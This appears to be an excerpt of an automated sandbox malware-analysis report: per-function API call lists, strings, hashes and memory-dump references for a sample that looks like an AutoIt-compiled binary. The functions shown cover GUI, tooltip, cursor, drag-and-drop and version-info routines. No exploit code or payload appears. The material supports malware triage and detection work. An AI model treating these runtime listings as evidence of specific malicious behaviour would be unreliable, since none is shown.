SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BA4ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00BA4AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00BA4AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00BA4B09
IsWindowVisible.USER32(?), ref: 00BA4B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00BA4B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00BA4B58
GetWindowRect.USER32(?,?), ref: 00BA4B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00BA4B96
GetMonitorInfoW.USER32(00000000,?), ref: 00BA4BB0
CopyRect.USER32(?,?), ref: 00BA4BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00BA4C32

Strings

tooltips_class32, xrefs: 00BA4A96
0, xrefs: 00BA4975
(, xrefs: 00BA4BA3

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: fefc47501382ba7f38f5058f24f61e0ea35da56b751a7a834f12ac376880037b
Instruction ID: 32b310e78fc72da166cd27df3e76cffcde966f45881aa11235548f6806fdf384
Opcode Fuzzy Hash: fefc47501382ba7f38f5058f24f61e0ea35da56b751a7a834f12ac376880037b
Instruction Fuzzy Hash: B8B19C70608351AFDB04DF68D885B6BBBE4FF86310F00895DF5999B2A1DBB0E805CB56

Function 00B8449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B844AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00B844D2
_wcscpy.LIBCMT ref: 00B84500
_wcscmp.LIBCMT ref: 00B8450B
_wcscat.LIBCMT ref: 00B84521
_wcsstr.LIBCMT ref: 00B8452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B84548
_wcscat.LIBCMT ref: 00B84591
_wcscat.LIBCMT ref: 00B84598
_wcsncpy.LIBCMT ref: 00B845C3

Strings

%u.%u.%u.%u, xrefs: 00B84626
StringFileInfo\, xrefs: 00B8451B
DefaultLangCodepage, xrefs: 00B845AB
\VarFileInfo\Translation, xrefs: 00B84540
04090000, xrefs: 00B8457E

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: d03b9d0805965f33bb1c61f781d9ab4d9094d9693f84203c5de0ce748026f42d
Instruction ID: 80963b4e51197e19409a5c1810520cdf2dc4d10402efbbd227212d0548c08964
Opcode Fuzzy Hash: d03b9d0805965f33bb1c61f781d9ab4d9094d9693f84203c5de0ce748026f42d
Instruction Fuzzy Hash: E541B071A402027ADB10BBB4CC47EFF77ECDF56710F0400EAF905E61A2EB749A11A6A5

Function 00B227D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B228BC
GetSystemMetrics.USER32(00000007), ref: 00B228C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B228EF
GetSystemMetrics.USER32(00000008), ref: 00B228F7
GetSystemMetrics.USER32(00000004), ref: 00B2291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B22939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B22949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B2297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B22990
GetClientRect.USER32(00000000,000000FF), ref: 00B229AE
GetStockObject.GDI32(00000011), ref: 00B229CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00B229D5

Part of subcall function 00B22344: GetCursorPos.USER32(?), ref: 00B22357
Part of subcall function 00B22344: ScreenToClient.USER32(00BE57B0,?), ref: 00B22374
Part of subcall function 00B22344: GetAsyncKeyState.USER32(00000001), ref: 00B22399
Part of subcall function 00B22344: GetAsyncKeyState.USER32(00000002), ref: 00B223A7

SetTimer.USER32(00000000,00000000,00000028,00B21256), ref: 00B229FC

Strings

AutoIt v3 GUI, xrefs: 00B22974

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 973193d1b4f91f455a93dd670e918ff9a9c0af2079d8570701dd9a8120100139
Instruction ID: 67d982c1e562792616df610ec78d23f057b782c9771084ebeb6a79d5a76e9a84
Opcode Fuzzy Hash: 973193d1b4f91f455a93dd670e918ff9a9c0af2079d8570701dd9a8120100139
Instruction Fuzzy Hash: A0B16D71A0021AEFDB24DFA8DD85BED7BE5FB08315F104269FA19EB290DB749850CB50

Function 00B7A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00B7A47A
__swprintf.LIBCMT ref: 00B7A51B
_wcscmp.LIBCMT ref: 00B7A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B7A583
_wcscmp.LIBCMT ref: 00B7A5BF
GetClassNameW.USER32(?,?,00000400), ref: 00B7A5F6
GetDlgCtrlID.USER32(?), ref: 00B7A648
GetWindowRect.USER32(?,?), ref: 00B7A67E
GetParent.USER32(?), ref: 00B7A69C
ScreenToClient.USER32(00000000), ref: 00B7A6A3
GetClassNameW.USER32(?,?,00000100), ref: 00B7A71D
_wcscmp.LIBCMT ref: 00B7A731
GetWindowTextW.USER32(?,?,00000400), ref: 00B7A757
_wcscmp.LIBCMT ref: 00B7A76B

Part of subcall function 00B4362C: _iswctype.LIBCMT ref: 00B43634

Strings

%s%u, xrefs: 00B7A515

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 6cb98535967400f4a51da0715c476afa4ddd7f70584dd5df810acbf05c7e3128
Instruction ID: 764c7008d19e7cbb42295f2bbeccff20964c291875600ebe4fb2c80acb82288a
Opcode Fuzzy Hash: 6cb98535967400f4a51da0715c476afa4ddd7f70584dd5df810acbf05c7e3128
Instruction Fuzzy Hash: 1AA1C271204206AFD758DF64C884BAEB7E8FF94315F048669F9ADD2190DB30ED45CB92

Function 00B7AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00B7AF18
_wcscmp.LIBCMT ref: 00B7AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 00B7AF51
CharUpperBuffW.USER32(?,00000000), ref: 00B7AF6E
_wcscmp.LIBCMT ref: 00B7AF8C
_wcsstr.LIBCMT ref: 00B7AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00B7AFD5
_wcscmp.LIBCMT ref: 00B7AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 00B7B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 00B7B055
_wcscmp.LIBCMT ref: 00B7B065
GetClassNameW.USER32(00000010,?,00000400), ref: 00B7B08D
GetWindowRect.USER32(00000004,?), ref: 00B7B0F6

Strings

ThumbnailClass, xrefs: 00B7AFE0, 00B7B060
@, xrefs: 00B7AEF9

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 6d4a250b9b69631c3a325071e32d7f512792b7dc1346b8e8872869948c8bd25f
Instruction ID: fd70f5d825e3e86745a3e4e725bb73b4a2c4ab755f1f9c1bbcdd6a02cffb8875
Opcode Fuzzy Hash: 6d4a250b9b69631c3a325071e32d7f512792b7dc1346b8e8872869948c8bd25f
Instruction Fuzzy Hash: AD81C1711082069FDB04DF14C885FBA7BE8EF84714F04C4AAFDA99A095DB34DE45CBA1

Function 00B7ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00B7AC33

Strings

[REGEXPTITLE:, xrefs: 00B7AC5B
[ACTIVE, xrefs: 00B7AC20
[LAST, xrefs: 00B7ACE0
[HANDLE:, xrefs: 00B7AC3F
LAST, xrefs: 00B7ABF8
[ALL, xrefs: 00B7ACD9
HANDLE=, xrefs: 00B7AC2C
CLASSNAME=, xrefs: 00B7AC70
ACTIVE, xrefs: 00B7AC0E
[CLASS:, xrefs: 00B7AC83
ALL, xrefs: 00B7ACC7
REGEXP=, xrefs: 00B7AC48

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: c0e1fbfffc6b00c9cc6ba901babeffaf46009f42efed9fa7716a906cf1513156
Instruction ID: cc9896f45da6b259c1e89431920a894738e249088fad1ff7a771179c0c720a6c
Opcode Fuzzy Hash: c0e1fbfffc6b00c9cc6ba901babeffaf46009f42efed9fa7716a906cf1513156
Instruction Fuzzy Hash: 0331C230988219BADA11EB60ED43EEEB7E4EF10710F6040EAF45A711E1FF616F049652

Function 00B94FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00B95013
LoadCursorW.USER32(00000000,00007F00), ref: 00B9501E
LoadCursorW.USER32(00000000,00007F03), ref: 00B95029
LoadCursorW.USER32(00000000,00007F8B), ref: 00B95034
LoadCursorW.USER32(00000000,00007F01), ref: 00B9503F
LoadCursorW.USER32(00000000,00007F81), ref: 00B9504A
LoadCursorW.USER32(00000000,00007F88), ref: 00B95055
LoadCursorW.USER32(00000000,00007F80), ref: 00B95060
LoadCursorW.USER32(00000000,00007F86), ref: 00B9506B
LoadCursorW.USER32(00000000,00007F83), ref: 00B95076
LoadCursorW.USER32(00000000,00007F85), ref: 00B95081
LoadCursorW.USER32(00000000,00007F82), ref: 00B9508C
LoadCursorW.USER32(00000000,00007F84), ref: 00B95097
LoadCursorW.USER32(00000000,00007F04), ref: 00B950A2
LoadCursorW.USER32(00000000,00007F02), ref: 00B950AD
LoadCursorW.USER32(00000000,00007F89), ref: 00B950B8
GetCursorInfo.USER32(?), ref: 00B950C8

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: f5fe06933fbb7ebfc33fdad97f24b940e5c1c4c50ca35582b1f9e61e357fe3d5
Instruction ID: 0d27c71655dd0fd2a66309e37443873e4556fc6e8d42a59380644cb293bdbefc
Opcode Fuzzy Hash: f5fe06933fbb7ebfc33fdad97f24b940e5c1c4c50ca35582b1f9e61e357fe3d5
Instruction Fuzzy Hash: B83105B1D4831A6ADF209FB68C899AFBFE8FF04750F50457AE50DE7280DA7865008F91

Function 00BAA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BAA259
DestroyWindow.USER32(?,?), ref: 00BAA2D3

Part of subcall function 00B27BCC: _memmove.LIBCMT ref: 00B27C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BAA34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BAA36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BAA382
DestroyWindow.USER32(00000000), ref: 00BAA3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B20000,00000000), ref: 00BAA3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BAA3F4
GetDesktopWindow.USER32 ref: 00BAA40D
GetWindowRect.USER32(00000000), ref: 00BAA414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BAA42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BAA444

Part of subcall function 00B225DB: GetWindowLongW.USER32(?,000000EB), ref: 00B225EC

Strings

tooltips_class32, xrefs: 00BAA346, 00BAA3D4
0, xrefs: 00BAA26F

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 3b1e47b7af70b8493c294acd531e9167b8950763aa96c8667186eeac3d0f0b06
Instruction ID: 55cd229e997833ae4a791ac70a1a74fe38c4a05167cf1543a5713c7c85083aee
Opcode Fuzzy Hash: 3b1e47b7af70b8493c294acd531e9167b8950763aa96c8667186eeac3d0f0b06
Instruction Fuzzy Hash: F671AE71144245AFD721CF28CC59FAA7BE9FB8A304F04456DF9858B3A0DB70E902CB66

Function 00BAC5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B22612: GetWindowLongW.USER32(?,000000EB), ref: 00B22623

DragQueryPoint.SHELL32(?,?), ref: 00BAC627

Part of subcall function 00BAAB37: ClientToScreen.USER32(?,?), ref: 00BAAB60
Part of subcall function 00BAAB37: GetWindowRect.USER32(?,?), ref: 00BAABD6
Part of subcall function 00BAAB37: PtInRect.USER32(?,?,00BAC014), ref: 00BAABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 00BAC690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00BAC69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00BAC6BE
_wcscat.LIBCMT ref: 00BAC6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00BAC705
SendMessageW.USER32(?,000000B0,?,?), ref: 00BAC71E
SendMessageW.USER32(?,000000B1,?,?), ref: 00BAC735
SendMessageW.USER32(?,000000B1,?,?), ref: 00BAC757
DragFinish.SHELL32(?), ref: 00BAC75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00BAC851

Strings

@GUI_DRAGFILE, xrefs: 00BAC800
@GUI_DRAGID, xrefs: 00BAC7C9
@GUI_DROPID, xrefs: 00BAC77E

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: c9e5835a380570b80b344b01cd50c9c436c4b786d0ab8b0a637f7729b20c6c26
Instruction ID: 311a698a770afafd03ea7017b3bb9932bd3a8f1a0602749815e504bccba81ac4
Opcode Fuzzy Hash: c9e5835a380570b80b344b01cd50c9c436c4b786d0ab8b0a637f7729b20c6c26
Instruction Fuzzy Hash: 6D617C71108301AFC711EFA4DC85DAFBBE8EF8A750F04096EF595972A1DB309949CB92

Function 00BA4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00BA4424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BA446F

Strings

CHECK, xrefs: 00BA448F
EXPAND, xrefs: 00BA4521
ISCHECKED, xrefs: 00BA45F2
SELECT, xrefs: 00BA4620
GETTOTALCOUNT, xrefs: 00BA4456
GETTEXT, xrefs: 00BA45C2
GETSELECTED, xrefs: 00BA457F
GETITEMCOUNT, xrefs: 00BA4551
UNCHECK, xrefs: 00BA464B
COLLAPSE, xrefs: 00BA44B5
EXISTS, xrefs: 00BA44D8

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: b63088662110d62c404c651e35a0d87de95e02235662ae925a2104a00634f740
Instruction ID: 8756901e6c22c33209236096afdc831da4735995610b77fd5523a7578802ee55
Opcode Fuzzy Hash: b63088662110d62c404c651e35a0d87de95e02235662ae925a2104a00634f740
Instruction Fuzzy Hash: E5915F712047119FCB04EF14C451A6EB7E1AF96354F0488E9F8AA5B3A2DB71ED49CB81

Function 00BAB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00BAB8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00BA91C2), ref: 00BAB910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BAB949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00BAB98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BAB9C3
FreeLibrary.KERNEL32(?), ref: 00BAB9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BAB9DF
DestroyIcon.USER32(?,?,?,?,?,00BA91C2), ref: 00BAB9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BABA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BABA17

Part of subcall function 00B42EFD: __wcsicmp_l.LIBCMT ref: 00B42F86

Strings

.dll, xrefs: 00BAB86D
.exe, xrefs: 00BAB84A
.icl, xrefs: 00BAB82A

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 60c10bc5413980ace151bb956acc9993963741f004edce6e4f7ee47d520f7b6a
Instruction ID: 86a44d959299cc117e73898b3b1577ae765511348eda60d542d3d46adb237744
Opcode Fuzzy Hash: 60c10bc5413980ace151bb956acc9993963741f004edce6e4f7ee47d520f7b6a
Instruction Fuzzy Hash: DD61F071904215BAEB14DF64CC42FBE77E8EF0A710F104196F925D61D2DB749A80DBA0

Function 00B8DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00B8DCDC
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B8DCEC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B8DCF8
__wsplitpath.LIBCMT ref: 00B8DD56
_wcscat.LIBCMT ref: 00B8DD6E
_wcscat.LIBCMT ref: 00B8DD80
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B8DD95
SetCurrentDirectoryW.KERNEL32(?), ref: 00B8DDA9
SetCurrentDirectoryW.KERNEL32(?), ref: 00B8DDDB
SetCurrentDirectoryW.KERNEL32(?), ref: 00B8DDFC
_wcscpy.LIBCMT ref: 00B8DE08
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B8DE47

Strings

*.*, xrefs: 00B8DE02

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 098fc4a630c3b636cde9a209fbd0b86183d88fef09e0d35302492be6e75c42d7
Instruction ID: f2e758987ee0a0e4b282953d6a70921a174210e02b721351878310de76deb2c3
Opcode Fuzzy Hash: 098fc4a630c3b636cde9a209fbd0b86183d88fef09e0d35302492be6e75c42d7
Instruction Fuzzy Hash: C2615B725043059FCB10EF60D845AAEB3E8FF89310F0449AEF999D72A1DB31E945CB92

Function 00B89C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00B89C7F

Part of subcall function 00B27DE1: _memmove.LIBCMT ref: 00B27E22

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B89CA0
__swprintf.LIBCMT ref: 00B89CF9
__swprintf.LIBCMT ref: 00B89D12
_wprintf.LIBCMT ref: 00B89DB9
_wprintf.LIBCMT ref: 00B89DD7

Strings

Incorrect parameters to object property !, xrefs: 00B89D5B
^ ERROR , xrefs: 00B89D4E
"%s" (%d) : ==> %s:, xrefs: 00B89DD2
"%s" (%d) : ==> %s:%s%s, xrefs: 00B89DB4
Line %d (File "%s"):, xrefs: 00B89CF3, 00B89D0C
Error: , xrefs: 00B89D81

Memory Dump Source

